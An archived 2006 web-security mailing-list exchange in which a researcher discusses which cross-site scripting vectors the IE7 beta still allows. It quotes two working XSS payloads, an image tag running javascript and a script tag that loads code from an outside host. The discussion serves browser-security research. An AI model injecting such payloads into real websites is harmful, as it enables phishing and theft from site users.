[WEB SECURITY] RE: XSS-Phishing on Financial Sites (Tip of the iceberg)

RSnake rsnake at shocking.com
Mon Jun 26 00:48:32 EDT 2006


  	Sorry, I should have been more explicit.  I meant inside image
tags:

  	<IMG SRC="javascript:alert('XSS');">

  	To my knowledge that is the only vector in IE7.0 that is broken,
and when I asked the IE product folks about it (several of them) they
each came back with the same answer, that they didn't think anyone was
using it, so they weren't sure if it was okay to depreciate or not -
actually they also said that it should still work at one point, but I
think they changed their tune when they realized it was most often used
as an attack, rather than a feature.  I gave them one working real world
example of where it was used, but I never heard back - they also had a
change of product folks around that time so it might have gotten lost in
the shuffle.  If one of the Microsoft security people that subscribe
here would like to comment to the forum, that would be helpful.

  	Again, this will only close one vector and it's a vector that
has already doesn't work Firefox, so this isn't a major win against XSS
- it's a minor one at best.  But to answer your question <script
src="http://ha.ckers.org/xss.jpg"></script> will continue to work, from
what I can tell.  Of course, I'd recommend downloading the beta and
testing yourself (not on a machine you care about, because lots of
websites aren't forward compatible and don't understand that IE7.0 is a
valid browser).

-RSnake
http://ha.ckers.org/
http://ha.ckers.org/xss.html
http://ha.ckers.org/blog/feed/

On Sun, 25 Jun 2006, arian.evans wrote:

>> time being, there are no efforts I am aware of, other than IE
>> appears to be breaking the JavaScript directive inside of images
>
> Inside of images, or inside of image tags?
>
> I still haven't found content type restrictions, and commonly
> embed images that are really js/vbs that IE will still execute.
>
> Haven't tried this on the newest IE 7 build either...think you
> mentioned they were breaking this.
>
> http://www.anachronic.com/xss
>
> has a few silly sample files, nothing malicious, plan to put more
> up if we ever release our payload packages.

----------------------------------------------------------------------------
The Web Security Mailing List: 
http://www.webappsec.org/lists/websecurity/

The Web Security Mailing List Archives: 
http://www.webappsec.org/lists/websecurity/archive/
http://www.webappsec.org/rss/websecurity.rss [RSS Feed]



More information about the websecurity mailing list